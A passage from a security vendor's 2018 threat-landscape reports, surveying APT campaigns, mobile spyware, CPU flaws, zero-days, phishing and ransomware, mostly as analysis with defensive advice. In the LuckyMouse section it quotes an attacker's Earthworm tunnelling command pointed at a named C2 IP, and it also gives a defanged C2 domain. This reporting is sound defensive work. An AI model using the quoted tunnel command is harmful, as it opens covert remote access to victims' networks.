Finally, we also detected new sets of activity that show an apparent interest in eastern European countries and former Soviet republics. In this group we find DustSquad, ParkingBear and Gallmaker. The latter seems to be interested in overseas embassies as well as military and defense targets in the Middle East.

On the big fishes

Even if some of the activity previously described doesn’t seem that technically advanced, it doesn’t mean it isn’t effective. Looking back we can cite a few public cases where it looks like these attacks are returning to the days when attackers were after major strategic research or blueprints that might be of the interest to state-sponsored groups, and not just some random data.

We have several examples. For instance, APT15 was suspected of targeting a company providing services to military and technology departments of the UK government. Intezer provided extra details about the activity of this group, though it is not clear who the ultimate victim was.

TEMP.Periscope was suspected of hacking maritime organizations related to the South China Sea. It wasn’t the only case in which the industry was targeted, as later it was discovered an unknown actor attacked companies related to Italian naval and defense industries.

Groups such as Thrip showed a clear interest in targeting satellite communication companies and defense organizations in the US and South East Asia.

Finally, the US Naval Undersea Warfare Center was attacked, according to the Washington Post, by a group linked to the Chinese Ministry of State Security, resulting in the theft of 614GB of data and blueprints.

The re-emergence of some of these groups and their victims don’t seem to be a coincidence. Some observers might even see the return of these big targeted attacks as the end of some sort of tacit agreement.

We also observed several attacks against journalists, activists, political dissidents and NGOs around the world. Many of these attacks involved malware developed by companies that provide surveillance tools to governments.

For instance, NSO and its Pegasus malware was discovered in more than 43 countries according to an external investigation, showing that business in this field is blooming. On a darker note, there were reports on how Saudi dissidents and Amnesty International volunteers were targeted with this malware.

The Tibetan community was also specifically targeted with different malware families, including a Linux backdoor, PowerShell payloads, and fake social media to steal credentials.

Finally, CitizenLab provided details of a campaign where Sandvine and GammaGroup artifacts were used for surveillance through local ISPs in Egypt, Turkey and Syria.

On naming and shaming

This is clearly a new strategy, adopted as a defense mechanism and as a response to the attackers, in some cases being justice able to claim individual working for APT groups. This can later be used in diplomatic offensives and lead to tougher consequences at the state level. It seems that governments are no longer shy of making these attacks public and providing details of their investigations, while pointing fingers at the suspected attackers. This is an interesting development and we will see how it evolves in the future.

The end of the Obama-era cyber-agreement between the US and China could be the reason for the wave of Chinese-speaking groups making a comeback, as well as the targeting of some of the high-profile ‘big fishes’ described above. We saw how in this new period of hostility between the two countries, the US obtained the extradition from Belgium of a Chinese intelligence officer charged with conspiring and attempting to commit economic espionage and steal trade secrets from multiple US aviation and aerospace companies.

The US also provided details about a North Korean citizen suspected of being part of the Lazarus group that was behind the Sony Entertainment attack and WannaCry activity, and who is now wanted by the FBI. Maybe in an unrelated note, the US Cert was very active during the year in providing indicators of compromise and detailing Lazarus (HiddenCobra) activity and the tools used by this actor.

After the infamous DNC hack, the US indicted 12 Russian citizens belonging to units 26165 and 74455 of the Russian Main Intelligence Directorate. Seven officers of GRU were also indicted for their alleged role in a campaign to retaliate against the World Anti-Doping Agency that exposed the Russian state-sponsored doping program.

In Europe, UK Officials and the UK National Cyber Security Center attributed the not-Petya attack that took place in June 2017 to Russian military units.

Finally, and in a very interesting initiative, the US Cyber Command launched an ‘information warfare’ campaign with a message to Russian operatives not to even try influencing the US mid-term election process.

All the above, and several other cases, shows how there seems to be a new doctrine in dealing with such hacking attempts, making them public and providing tools for media campaigns, future negotiations and diplomacy, as well as directly targeting operatives.

On hardware

The closer malware gets to the hardware level, the more difficult it is to detect and delete. This is no easy task for the attackers, as it’s usually difficult to find the exploit chain to get that deep in the system, along with the difficulty in developing reliable malware working in such deep levels. That always raises the question of whether this malware already exists, quietly abusing modern CPU architecture characteristics, and we simply don’t see it.

Recent discoveries of vulnerabilities in different processors open the door to exploits that might be around for years, because replacing the CPU is not something that can be easily done. It is not clear yet how Meltdown/Specter and AMDFlaws among others might be exploited and abused in the future, but attackers don’t really need to rush as these vulnerabilities will probably be around for a long time. Even if we haven’t see them being exploited in the wild yet, we believe this is a very valuable piece of knowledge for attackers and maybe also a timely reminder for us all about how important hardware security is.

That leads on to something we actually saw in the VPNFilter attack, in this case targeting networking devices on a massive scale. This campaign, attributed to a Russian-speaking set of activity, allowed attackers to infect hundreds of thousands of devices, providing control of the network traffic as well as allowing MITM attacks. We saw APT actors abusing network devices in the past but never in such an aggressive way.

On other stuff

Triton/Trisis is an industrial-targeting set of activity that gained popularity during the year as it was discovered in some victims, and is suspected of shutting down an oil refinery in an attack where the actor used a 0-day. According to FireEye, this actor might have Russian origins.

In our predictions we already discussed the possibility of destructive attacks becoming normal in situations where tensions exist between two adversaries, using collateral victims to cause harm and send messages in this dangerous grey zone between an open attack and diplomacy.

Financial attackers may not be using very new techniques, but that may be because they don’t need to. The Carbanak group was ‘beheaded’ with the arrest in Spain of one of their leaders; however, that doesn’t seem to have had any impact on subsequent Fin7 activity during the year. They deployed their new Griffon JavaScript backdoor targeting restaurant chains. Meanwhile, a suspected subset of this group – the CobaltGoblin group – was also very active targeting banks in a more direct way.

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
  • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
  • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as IoCs (indicators of compromise) and YARA rules.
  • Establish enterprise-grade patch management processes.

High-profile organizations should adopt elevated levels of cybersecurity, since attacks against them are inevitable and are unlikely to ever cease.

DustSquad is another threat actor that has targeted organizations in Central Asia. Kaspersky Lab has been monitoring this Russian language cyber-espionage group for the last two years, providing private intelligence reports to our customers on four of their campaigns involving custom Android and Windows malware. Recently, we described a malicious program called Octopus, used by DustSquad to target diplomatic bodies in the region – the name was originally coined by ESET in 2017, after the 0ct0pus3.php script used by the actor on their old C2 servers. Using the Kaspersky Attribution Engine, based on similarity algorithms, we discovered that Octopus is related to DustSquad. In our telemetry, we tracked this campaign back to 2014 in the former Soviet republics of Central Asia (still mostly Russian-speaking) and in Afghanistan. In April, we discovered a new Octopus sample masquerading as Telegram Messenger with a Russian interface. We were unable to find legitimate software that this malware is impersonating – in fact, we don’t believe it exists. However, the attackers used the potential Telegram ban in Kazakhstan to push its dropper as alternative communication software for the political opposition. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

In October, we published our analysis of Dark Pulsar. Our investigation started in March 2017, when the Shadow Brokers published stolen data that included two frameworks – DanderSpritz and FuzzBunch. DanderSpritz contains various types of plugin designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. Together, they provide a very powerful platform for cyber-espionage. The leak didn’t include the Dark Pulsar backdoor itself: rather, it contained an administrative module for controlling the backdoor. However, by creating special signatures based on some magic constants in the administrative module, we were able to catch the implant itself. This implant gives the attackers remote control over compromised devices. We found 50 victims, all located in Russia, Iran and Egypt, but we believe there were probably many more. For one thing, the DanderSpritz interface is able to manage a large number of victims at the same time. In addition, the attackers often delete their malware once the campaign has ended. We think that the campaign stopped following the ‘Lost in Translation’ leak by the Shadow Brokers in April 2017. You can find our suggested mitigation strategies for complex threats such as Dark Pulsar here.

Mobile APT campaigns

The mobile APT threats segment saw three significant events: the detection of the Zoopark, BusyGasper and Skygofree cyber-espionage campaigns.

Technically, all three are well-designed and similar in their primary purpose – spying on selected victims. Their main aim is to steal all available personal data from a mobile device: interception of calls, messages, geolocation, etc. There is even a function for eavesdropping via the microphone – the smartphone is used as a ‘bug’ that doesn’t even need to be hidden from an unsuspecting target.

The cybercriminals paid particular attention to the theft of messages from popular instant messaging services, which have now largely replaced standard means of communication. In several cases, the attackers used exploits that were capable of escalating the Trojans’ local privileges on a device, opening up virtually unlimited access to remote monitoring, and often device management.

Keylogger functionality was also implemented in two of the three malicious programs, with the cybercriminals recording every keystroke on a device’s keyboard. It’s noteworthy that in order to intercept clicks the attackers didn’t even require elevated privileges.

Geographically, victims were recorded in a variety of countries: Skygofree targeted users in Italy, BusyGasper attacked individual Russian users, and Zoopark operated in the Middle East.

It’s also worth noting that there’s an increasingly prominent trend of criminals involved in espionage showing a preference for mobile platforms, because they offer a lot more personal data.

Exploits

Exploiting vulnerabilities in software and hardware remains an important means of compromising devices of all kinds.

Early this year, two severe vulnerabilities affecting Intel CPUs were reported. Dubbed Meltdown and Spectre respectively, they both allow an attacker to read memory from any process and from its own process respectively. The vulnerabilities have been around since at least 2011. Meltdown (CVE-2017-5754) affects Intel CPUs and allows an attacker to read data from any process on the host system. While code execution is required, this can be obtained in various ways – for example, through a software bug or by visiting a malicious website that loads JavaScript code that executes the Meltdown attack. This means that all the data residing in memory (passwords, encryption keys, PINs, etc.) could be read if the vulnerability is exploited properly. Vendors were quick to publish patches for the most popular operating systems. The Microsoft update, released on January 3, was not compatible with all antivirus programs – possibly resulting in a BSoD (Blue Screen of Death) on incompatible systems. So updates could only be installed if an antivirus product had first set a specific registry key, to indicate that there were no compatibility problems. Spectre (CVE-2017-5753 and CVE-2017-5715) is slightly different. Unlike Meltdown, this attack also works on other architectures (such as AMD and ARM). Also, Spectre is only able to read the memory space of the exploited process, and not that of any process. More importantly, aside from some countermeasures in some browsers, no universal solution is readily available for Spectre. It became clear in the weeks following the reports of the vulnerabilities that they are not easily fixable. Most of the released patches have reduced the attack surface, mitigating against known ways of exploiting the vulnerabilities, but they don’t eradicate the danger completely. Since the problem is fundamental to the working of the vulnerable CPUs, it was clear that vendors would probably have to grapple with new exploits for years to come. In fact, it didn’t take years. In July, Intel paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant one (CVE-2017-5753). Spectre 1.1 (CVE-2018-3693) can be used to create speculative buffer overflows. Spectre 1.2 allows an attacker to overwrite read-only data and code pointers to breach sandboxes on CPUs that don’t enforce read-write protections. These new vulnerabilities were uncovered by MIT researcher Vladimir Kiriansky and independent researcher Carl Waldspurger.

On April 18, someone uploaded an interesting exploit to VirusTotal. This was detected by several security vendors, including Kaspersky Lab – using our generic heuristic logic for some older Microsoft Word documents. It turned out to be a new zero-day vulnerability for Internet Explorer (CVE-2018-8174) – patched by Microsoft on May 8, 2018. Following processing of the sample in our sandbox system, we noticed that it successfully exploited a fully patched version of Microsoft Word. This led us to carry out a deeper analysis of the vulnerability. The infection chain consists of the following steps. The victim receives a malicious Microsoft Word document. After opening it, the second stage of the exploit is downloaded – an HTML page containing VBScript code. This triggers a UAF (Use After Free) vulnerability and executes shellcode. Despite the initial attack vector being a Word document, the vulnerability is actually in VBScript. This is the first time we have seen a URL Moniker used to load an IE exploit in Word, but we believe that this technique will be heavily abused by attackers in the future, since it allows them to force victims to load IE, ignoring the default browser settings. It’s likely that exploit kit authors will start abusing it in both drive-by attacks (through the browser) and spear-phishing campaigns (through a document). To protect against this technique, we would recommend applying the latest security updates and using a security solution with behavior detection capabilities.

In August, our AEP (Automatic Exploit Prevention) technology detected a new kind of cyberattack that tried to use a zero-day vulnerability in the Windows driver file, ‘win32k.sys’. We informed Microsoft about the issue and on October 9 Microsoft disclosed the vulnerability (CVE-2018-8453) and published an update. This is a very dangerous vulnerability, giving attackers control over a compromised computer. The vulnerability was used in a highly targeted attack campaign on organizations in the Middle East – we found fewer than a dozen victims. We believe that these attacks were carried out by the FruityArmor threat actor.

In late October we reported another vulnerability to Microsoft, this time a zero-day elevation of privilege vulnerability in ‘win32k.sys’ – which can be used by an attacker to obtain the privileges necessary for persistence on a victim’s system. This vulnerability has also been exploited in a very limited number of attacks on organizations in the Middle East. Microsoft published an update for this vulnerability (CVE-2018-8589) on November 13. This threat was also detected by means of our proactive technologies – the advanced sandboxing and anti-malware engine for the Kaspersky Anti Targeted Attack Platform and our AEP technology.

Browser extensions – extending the reach of cybercriminals

Browser extensions can make our lives easier, hiding obtrusive advertising, translating text, helping us choose the goods we want in online stores and more. Unfortunately, there are also less desirable extensions that are used to bombard us with advertising or collect information about our activities. There are also extensions designed to steal money. Earlier this year, one of these caught our eye because it communicated with a suspicious domain. The malicious extension, named Desbloquear Conteúdo (‘Unblock Content’ in Portuguese), targeted customers of Brazilian online banking services, harvesting logins and passwords in order to obtain access to victims’ bank accounts.

In September, hackers published the private messages from at least 81,000 Facebook accounts, claiming that this was just a small fraction of a much larger haul comprising 120 million accounts. In a Dark Web advert, the attackers offered the messages for 10 cents per account. The attack was investigated by the BBC Russian Service and cybersecurity company Digital Shadows. They found that of 81,000 accounts, most were from Ukraine and Russia, although accounts from other countries were also among them, including the UK, the US and Brazil. Facebook suggested that the messages were stolen using a malicious browser extension.

Malicious extensions are quite rare, but we need to take them seriously because of the potential damage they can cause. You should only install verified extensions with large numbers of installations and reviews in the Chrome Web Store or other official service. Even so, in spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published there. So it’s a good idea to use an internet security product that gives you a warning if an extension acts suspiciously.

The World Cup of fraud

Social engineering remains an important tool in the arsenal of cyberattackers of all kinds. Fraudsters are always on the lookout for opportunities to make money off the back of major sporting events; and the FIFA World Cup is no different. Long before the event kicked off, cybercriminals had started to create phishing websites and send messages exploiting World Cup themes. These phishing messages included notifications of a fake lottery win, or a message offering tickets to one of the matches. Fraudsters often go to great lengths to mimic legitimate partner sites, creating well-designed pages and even including SSL certificates for added credibility. The criminals also extract data by mimicking official FIFA notifications: the victim receives a message telling them that the security system has been updated and all personal data must be re-entered to avoid lockout. These messages contain a link to a fake page where the scammers harvest the victim’s personal information.

You can find our report on the ways cybercriminals have exploited the World Cup in order to make money here. We also provided tips on how to avoid phishing scams – advice that holds true for any phishing scams, not just for those related to the World Cup.

In the run up to the tournament, we also analyzed wireless access points in the 11 cities hosting FIFA World Cup matches – nearly 32,000 Wi-Fi hotspots in total. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points. More than a fifth of Wi-Fi hotspots were using unreliable networks. This meant that criminals simply needed to be located near an access point to intercept traffic and get their hands on people’s data. Around three quarters of all access points used WPA/WPA2 encryption, considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complicated encryption key can take years to successfully hack. However, even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary and key reinstallation attacks, for which there are a large number of tutorials and open source tools available online. Any attempt to intercept traffic from WPA Wi-Fi in public access points can also be made by penetrating the gap between the access point and the device at the beginning of the session.

You can read our report here, together with our recommendations on the safe use of Wi-Fi hotspots, advice that is valid wherever you may be – not just at the World Cup.

Financial fraud on an industrial scale

In August, Kaspersky Lab ICS CERT reported a phishing campaign designed to steal money from enterprises – primarily manufacturing companies. The attackers used standard phishing techniques to trick their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals used legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs were employed to gain access to the device, scan for information on current purchases and details of financial and accounting software used by the victims. The attackers then used different ploys to steal company money – for example, by replacing the banking details in transactions. By the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.

Our research highlights that, even when threat actors use simple techniques and known malware, they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions.

You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.

Ransomware – still a threat

The fall in the number of ransomware attacks in the last year or so has been well-documented. Nevertheless, this type of malware remains a significant problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the KeyPass Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East. KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files, located in directories that are hardcoded in the malware. Encrypted files are given the additional extension ‘KEYPASS’ and ransom notes, called ‘!!!KEYPASS_DECRYPTION_INFO!!!.txt’, are saved in each directory containing encrypted files. The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file. Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the form of JSON. If the C2 is unavailable – for example, if the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, the decryption of the victim’s files is trivial.

Probably the most interesting feature of the KeyPass Trojan is the ability to take ‘manual control’. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.

